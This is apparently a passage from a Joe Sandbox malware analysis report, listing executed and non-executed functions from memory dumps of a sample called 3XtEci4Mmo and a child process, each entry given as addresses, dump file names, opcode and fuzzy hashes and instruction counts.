                                                                                          • Instruction Fuzzy Hash: 8FF0983091894D9FDF94EFA8C958AEA77E0FF28305F0105A6E81DC7165DB34EAA4CB41
                                                                                          Function 00007FFD9B8906C8 Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1911790532.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a23dbf1ab86d35748b689742dcd15d8613a9e18f24fbbf0cce559dcb7f833e9d
                                                                                          • Instruction ID: 1708302452b7ed0c1fd22d5015f91d515d3b261662ffe16bf0716a74afb575d5
                                                                                          • Opcode Fuzzy Hash: a23dbf1ab86d35748b689742dcd15d8613a9e18f24fbbf0cce559dcb7f833e9d
                                                                                          • Instruction Fuzzy Hash: 6BF01C3091594E9FEB90EFA8C8596EA7BE0FF58304F410566E81CD21A4DA74A6A0CB81
                                                                                          Function 00007FFD9B890CE5 Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1911790532.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 50d213273db991d074905353a2a029cf8078d54979539fb1770a1c4124d12290
                                                                                          • Instruction ID: 27a823eaecebc4607333a1ceec9bdbb595c1a6c2a8c76c23d04e9ba9c37454ba
                                                                                          • Opcode Fuzzy Hash: 50d213273db991d074905353a2a029cf8078d54979539fb1770a1c4124d12290
                                                                                          • Instruction Fuzzy Hash: 59F04F70B1925B8AEB58DB94C8556BA77B1EB58701F040A7AD429C22D1DB7866808A84
                                                                                          Function 00007FFD9B8916F3 Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1911790532.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f211d9aa6e18aed5fbcf3642e4af4a530ebc16e9e9db790adc23ad9548f6cb6a
                                                                                          • Instruction ID: 1ee17e85ab400e5eb93c4ac470254aeecc592bca50ad338f5345bb907ea1fdc1
                                                                                          • Opcode Fuzzy Hash: f211d9aa6e18aed5fbcf3642e4af4a530ebc16e9e9db790adc23ad9548f6cb6a
                                                                                          • Instruction Fuzzy Hash: 8EE09231A1A68EDBDB21EFA4DD002FD77A0FF05300F000476E41CC2091DA347618C751
                                                                                          Function 00007FFD9B8986E4 Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1911790532.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5036e010f9b8cbd487eea6128fcef98c5692dc39cfc3f53ff2891a1ce8b0448b
                                                                                          • Instruction ID: bb2cac1f07a629f66328ba1814701556618e3ac87721efab6c9cebebd9ac8045
                                                                                          • Opcode Fuzzy Hash: 5036e010f9b8cbd487eea6128fcef98c5692dc39cfc3f53ff2891a1ce8b0448b
                                                                                          • Instruction Fuzzy Hash: 98F03031E1911ECFDB24DF44C8542A877F1BB54311F4481B5D04996294EF38AA88DF40
                                                                                          Function 00007FFD9B8996A5 Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1911790532.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8be3959b000755ea1050b74368c5c6a6fcc409af37b958a6e8d827e5b42d527d
                                                                                          • Instruction ID: 2e8ac51a27e86322aa4d7ec719c60c027b7690e8e76d390de224a3499c3c9fa8
                                                                                          • Opcode Fuzzy Hash: 8be3959b000755ea1050b74368c5c6a6fcc409af37b958a6e8d827e5b42d527d
                                                                                          • Instruction Fuzzy Hash: 6AF05E30E1945D4BEBA4DF58DC546E87771EF85340F0002F7A00DA22E6DE342E428F40
                                                                                          Function 00007FFD9BF9AA95 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2143335975.00007FFD9BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bf90000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2d90d3d5d34d72ce9fb14082c5a770d039483a2b43c94b770eb04607b8d71996
                                                                                          • Instruction ID: b9e45f0121afca2af7e8c009319943b68061d31fc32628d9eaf8c4c9043999a9
                                                                                          • Opcode Fuzzy Hash: 2d90d3d5d34d72ce9fb14082c5a770d039483a2b43c94b770eb04607b8d71996
                                                                                          • Instruction Fuzzy Hash: 5FE0D835D1E28CCBE779CF5085660ECBF70FF00300F5A02E7D408071A2EB255B089242
                                                                                          Function 00007FFD9BF9D437 Relevance: .0, Instructions: 18COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2143335975.00007FFD9BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bf90000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 564a26486b37c2a08a1bd278ee822ec21663ca56f01cba29e626ed836fb3557d
                                                                                          • Instruction ID: b091a51aa160f110b648307c1433380564cb21b47b43bce75b051099ef5c36b9
                                                                                          • Opcode Fuzzy Hash: 564a26486b37c2a08a1bd278ee822ec21663ca56f01cba29e626ed836fb3557d
                                                                                          • Instruction Fuzzy Hash: BCE0C201F0E38E4BEB365BF848700382F908F0B3447260BF6D18A8A1E3C8663944C312
                                                                                          Function 00007FFD9BF91DCB Relevance: .0, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2143335975.00007FFD9BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bf90000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3b5fca223a3f42f4550eda34b4d9cb52d71eead1c6bc215459d052c0609e6ff5
                                                                                          • Instruction ID: bfc5951770d53a863f3350f140314cd6f8cb635534a82e29cc53950a07267eea
                                                                                          • Opcode Fuzzy Hash: 3b5fca223a3f42f4550eda34b4d9cb52d71eead1c6bc215459d052c0609e6ff5
                                                                                          • Instruction Fuzzy Hash: 96D0C914B0F50FA5F23A5EC2813027E51A09F50B05E22423FC19F819E2CE1E7B41A601
                                                                                          Function 00007FFD9BF9DF0B Relevance: .0, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2143335975.00007FFD9BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bf90000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 390f3b597526f82fb39636d99223588db985da15a98e006492ede90ab81daf30
                                                                                          • Instruction ID: 5c0d469b9047f8a52e04384f338e79e3d3337d2893521773542cea158710398b
                                                                                          • Opcode Fuzzy Hash: 390f3b597526f82fb39636d99223588db985da15a98e006492ede90ab81daf30
                                                                                          • Instruction Fuzzy Hash: F4D0C938B0F50F85F6395EC1813123961955F10304E72023ED15F42DE1CD2F7B416205
                                                                                          Function 00007FFD9BF912DF Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2143335975.00007FFD9BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bf90000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e8f2f1429bb99e36af9b6db7b7709cf8b8e32c112cebce67d22e596276d270bd
                                                                                          • Instruction ID: 52e1075ed1bb850ec9700f31081f322153a71c788fc4ad671aa72740b9bbfbdb
                                                                                          • Opcode Fuzzy Hash: e8f2f1429bb99e36af9b6db7b7709cf8b8e32c112cebce67d22e596276d270bd
                                                                                          • Instruction Fuzzy Hash: 84C04C10F0E247ABE6315AE9486153C56905F0B204B960671D54A8A3E3DC997A45E651

                                                                                          Non-executed Functions

                                                                                          Function 00007FFD9BA408FB Relevance: 122.5, Strings: 96, Instructions: 2486COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1949148282.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba40000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $!$"$#$$$%$&$'$($)$*$+$,$-$.$/$0$1$2$3$4$5$6$7$8$9$:$;$<$=$>$?$@$A$B$C$D$E$F$G$H$I$J$K$L$M$N$O$P$Q$R$S$T$U$V$W$X$Y$Z$[$\$]$^$_$`$a$b$c$d$e$f$g$h$i$j$k$l$m$n$o$p$q$r$s$t$u$v$w$x$y$z${$|$}$}i2$~
                                                                                          • API String ID: 0-1196138438
                                                                                          • Opcode ID: 41533564973be1ce213a7fa1b8ccc3bc29c46da66ed2af2f792205a7e70e1f43
                                                                                          • Instruction ID: 3e764176235e04d336cee253509701df4c05e2f735c2e4d29224644bec50331a
                                                                                          • Opcode Fuzzy Hash: 41533564973be1ce213a7fa1b8ccc3bc29c46da66ed2af2f792205a7e70e1f43
                                                                                          • Instruction Fuzzy Hash: 0C43D670A155198FEBA9EB18C8A5BADB7F1FF48300F5045EAD00EA72D1DE356E818F44
                                                                                          Function 00007FFD9BA523F5 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1949148282.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba40000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "2_I
                                                                                          • API String ID: 0-1051931128
                                                                                          • Opcode ID: 2195136a469f22cbe7d91315b5dc29a8d53324b4c90f86d449125b95bc8ffab3
                                                                                          • Instruction ID: 7587c08cb0523a84f8316e5159f4643b9f1123113207a77073976ba0b8aa4fe8
                                                                                          • Opcode Fuzzy Hash: 2195136a469f22cbe7d91315b5dc29a8d53324b4c90f86d449125b95bc8ffab3
                                                                                          • Instruction Fuzzy Hash: 1A512662B0F3D25FE71357F8A8750E97F60AF0225831D40F3C0D84A0A7FA996A46C755
                                                                                          Function 00007FFD9BA55408 Relevance: .4, Instructions: 440COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1949148282.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba40000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 87b7115d8cc2af7a93cf3bd79872d97917398ba207336deb02c8812554f012fd
                                                                                          • Instruction ID: 553b44c032ec411ead488660527ff70d5416ef48e7f1954694c2dbc4400224ab
                                                                                          • Opcode Fuzzy Hash: 87b7115d8cc2af7a93cf3bd79872d97917398ba207336deb02c8812554f012fd
                                                                                          • Instruction Fuzzy Hash: 95E14D62E0F7D35FE3169BB89C661ED7F61FF0125871940BBC099C60B7B9A976068280
                                                                                          Function 00007FFD9BA549B0 Relevance: .4, Instructions: 364COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1949148282.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba40000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3e28176475835e3e5e80294978a9e21e750351dd9a892b5b1af20a8d889f30a1
                                                                                          • Instruction ID: 92af6f0f8af0fcfaa32dddb6ddb104cd6d4dc72df26b2a737b85ac6cdec79f51
                                                                                          • Opcode Fuzzy Hash: 3e28176475835e3e5e80294978a9e21e750351dd9a892b5b1af20a8d889f30a1
                                                                                          • Instruction Fuzzy Hash: 84D1CAA2E0FAC95FF3614BE8086511DBEA3FF8119070A40BED494865BFB9A5BF15C344
                                                                                          Function 00007FFD9BA5412A Relevance: .3, Instructions: 323COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1949148282.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba40000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b7ebd7cac6566449f84d24809ff05759e52050e20a16abc414d558cc430d5271
                                                                                          • Instruction ID: 935a08bd904a5a161dcf95d66d945166afb87ee6d66ccadd98482bfe470e1435
                                                                                          • Opcode Fuzzy Hash: b7ebd7cac6566449f84d24809ff05759e52050e20a16abc414d558cc430d5271
                                                                                          • Instruction Fuzzy Hash: 0DA15A21B0E65A8BD7299BF8A4614FC77A0FF05314B1601BBC08EC719BEE9D76468781
                                                                                          Function 00007FFD9BA533F9 Relevance: .3, Instructions: 305COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1949148282.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba40000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0d38c98d7389013e40680d72c4f230469f30b2fb8a91614aad97a0d6c1e275d9
                                                                                          • Instruction ID: 68421867fd3c48c2913e9015a308e5d15a3fed9c2451314f683da8ade8f58c87
                                                                                          • Opcode Fuzzy Hash: 0d38c98d7389013e40680d72c4f230469f30b2fb8a91614aad97a0d6c1e275d9
                                                                                          • Instruction Fuzzy Hash: 85A1C552A0E2E26AD31B77B8B8B98E63F60DF0222C71D41F3D0DD4E0D7ED58644B9295
                                                                                          Function 00007FFD9BA525A8 Relevance: .3, Instructions: 283COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1949148282.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba40000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 64e8d78d28c79b4d7b2f87dee02635f2cbe3f61640140e049dca337d21c9884d
                                                                                          • Instruction ID: e3ddfcf327f0e715432ec7a2fd18038aa5ee9cb5905f0fb2eba78e64ae2110cc
                                                                                          • Opcode Fuzzy Hash: 64e8d78d28c79b4d7b2f87dee02635f2cbe3f61640140e049dca337d21c9884d
                                                                                          • Instruction Fuzzy Hash: 86A13972B0F7C60BEB668BF858641AD7FA1EF42250B0941FBD098461F7D9E96B05C780
                                                                                          Function 00007FFD9B89086A Relevance: .2, Instructions: 225COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1911790532.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cec16a0e714b05a9f49e2603a69fd00e57e9a7d67a55f74916e555725bf8de8a
                                                                                          • Instruction ID: 174580fffdd9fbdf2909477882c7841ff76302faf56487bfffe48134ba1402e3
                                                                                          • Opcode Fuzzy Hash: cec16a0e714b05a9f49e2603a69fd00e57e9a7d67a55f74916e555725bf8de8a
                                                                                          • Instruction Fuzzy Hash: 60718030A08A8D8FDBA8EF58C855BF977E1FF59310F10412AE84EC7291DB749985CB81
                                                                                          Function 00007FFD9BA534D3 Relevance: .2, Instructions: 217COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1949148282.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba40000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4c4a8157cd08f2a65c34c7d2b6dac7f22769f740ba3f3c891e1ba5a4351f71d7
                                                                                          • Instruction ID: f4f1aadea3cb86154049dda460c348867cde6d5ff23af06859eb1e3fed8727fe
                                                                                          • Opcode Fuzzy Hash: 4c4a8157cd08f2a65c34c7d2b6dac7f22769f740ba3f3c891e1ba5a4351f71d7
                                                                                          • Instruction Fuzzy Hash: 2C61C752A0E2F2AAD71B77B8B8BA8E53F509F0222C71C41F3D0DD4E0D7EC58644B9295
                                                                                          Function 00007FFD9BA53828 Relevance: .2, Instructions: 185COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1949148282.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba40000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1339c7640899f5fe13ec940f8274f4d9d457da4ca3164d7d15ed50b78e723356
                                                                                          • Instruction ID: 667ece351f9436e620271669fb36ad6a50944e22e58721c6bba1beed53cb514c
                                                                                          • Opcode Fuzzy Hash: 1339c7640899f5fe13ec940f8274f4d9d457da4ca3164d7d15ed50b78e723356
                                                                                          • Instruction Fuzzy Hash: 7451968BB0FAC61BEB6207F408350ADAF91BFD259431E48F6D4C5463ABB595BB09C340
                                                                                          Function 00007FFD9BA53EB0 Relevance: .1, Instructions: 129COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1949148282.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba40000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6746602247aaa9730434d33d868ca1b582cd188a5f9e07f72b6f4fa63977addc
                                                                                          • Instruction ID: a1ac7c3b47031f6848a94c8a96a1bf863304238e39364f14dd9e4ff6aa0e3205
                                                                                          • Opcode Fuzzy Hash: 6746602247aaa9730434d33d868ca1b582cd188a5f9e07f72b6f4fa63977addc
                                                                                          • Instruction Fuzzy Hash: 3441A197B0FAC60BF76247F85C2416A6FA1AFD216070E00F6D4D54E2BBA4C9EA0DC751
                                                                                          Function 00007FFD9BA4BECD Relevance: .1, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1949148282.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba40000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e3b35e92e05c6371ef3ee9fd0b4f4a8c4c26e91f7d363b411c89281d6db4893b
                                                                                          • Instruction ID: ab7f74718f64a4c4599ec9c47c2b9180b3ecdd3b58e3ab6bcba6155123296be9
                                                                                          • Opcode Fuzzy Hash: e3b35e92e05c6371ef3ee9fd0b4f4a8c4c26e91f7d363b411c89281d6db4893b
                                                                                          • Instruction Fuzzy Hash: 10310670E18A1D8FCF88DF98D451AEDBBF1FB69300F6051AAD419E7291C735A941CB44
                                                                                          Function 00007FFD9B8909B0 Relevance: 5.2, Strings: 4, Instructions: 186COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1911790532.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: c9$!k9$"s9$#{9
                                                                                          • API String ID: 0-1692736845
                                                                                          • Opcode ID: 813b976293575c92dc9e828ac48e389b21f4c8067e341c089456f878d3b191d9
                                                                                          • Instruction ID: 13f73874629b1818b00e1568c052b2b2c9b1a3424ae9b2344a781cb55368e75c
                                                                                          • Opcode Fuzzy Hash: 813b976293575c92dc9e828ac48e389b21f4c8067e341c089456f878d3b191d9
                                                                                          • Instruction Fuzzy Hash: 1C51C087F1957685E21E33FC79299ED9B84CF8437DB0846B7E16E8A0C76C88608393D5
                                                                                          Function 00007FFD9B89AA3A Relevance: 5.1, Strings: 4, Instructions: 66COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1911790532.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $)$8$w
                                                                                          • API String ID: 0-949773775
                                                                                          • Opcode ID: 787888294328aa335bb9034025536b42efe04e7ea4ba37647eaf4dbd915b9d3b
                                                                                          • Instruction ID: 4ca436faad9844f50cb23579ab2813d1d718e2ccf43109fbcc2562c68d51532a
                                                                                          • Opcode Fuzzy Hash: 787888294328aa335bb9034025536b42efe04e7ea4ba37647eaf4dbd915b9d3b
                                                                                          • Instruction Fuzzy Hash: 1231B474E0962ECEEFB0EB64C8987A8B7B0AB58301F5142F5D00DE22A5CF745AC59F00

                                                                                          Executed Functions

                                                                                          Function 00007FFD9B8B0D68 Relevance: .3, Instructions: 274COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000034.00000002.2576446616.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 494c808cb5b5489627da06aebbc269f82759dfa52325bcc576f38bae559534df
                                                                                          • Instruction ID: 13b49adabe7116ec248b86d006343ca52109edc22564ccffd63eab2bef01b59f
                                                                                          • Opcode Fuzzy Hash: 494c808cb5b5489627da06aebbc269f82759dfa52325bcc576f38bae559534df
                                                                                          • Instruction Fuzzy Hash: 1FA1D071A19A9D8FEB98DF68C8657A97FF1FB5A300F4401BAD009D72D6CB782411CB81
                                                                                          Function 00007FFD9B8B9564 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000034.00000002.2576446616.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: P
                                                                                          • API String ID: 0-3110715001
                                                                                          • Opcode ID: b1ce6d5685ecb5856ac026e867556c8bd9cf24b350935c1720020e677fba9d85
                                                                                          • Instruction ID: 618bd265ff246c86ef756e48702abe2c21f6f3a8745e987378144c784cdfb7ba
                                                                                          • Opcode Fuzzy Hash: b1ce6d5685ecb5856ac026e867556c8bd9cf24b350935c1720020e677fba9d85
                                                                                          • Instruction Fuzzy Hash: C4210E70E15A6D8EEB74EB54CC587E9B3B1EB48306F1002E9C50DA72A2CB741AC58F84
                                                                                          Function 00007FFD9B8B08D0 Relevance: .2, Instructions: 179COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000034.00000002.2576446616.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 76c1ce13d9a2c86d801eb424f97a6a62eb645a1a642a64f6bc5e89ecba5a476b
                                                                                          • Instruction ID: fff00bc5dc61628cb045d98aee7e98877c82e4fc7f6219e6be6c0c00fa75c7f2
                                                                                          • Opcode Fuzzy Hash: 76c1ce13d9a2c86d801eb424f97a6a62eb645a1a642a64f6bc5e89ecba5a476b
                                                                                          • Instruction Fuzzy Hash: 1751A131A1865D8FDB45FFA8E4A5AFDBBA0FF48315F1401BBD009D72A6DA34A441CB80
                                                                                          Function 00007FFD9B8B0910 Relevance: .2, Instructions: 168COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000034.00000002.2576446616.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: da37d15bea86b6bc9244216d25dcee321653108638573c71f05fc760ea5374c2
                                                                                          • Instruction ID: 351c1686ec1aee21ec1c05ddee6911e785ab109373615dba0571a23922e2af90
                                                                                          • Opcode Fuzzy Hash: da37d15bea86b6bc9244216d25dcee321653108638573c71f05fc760ea5374c2
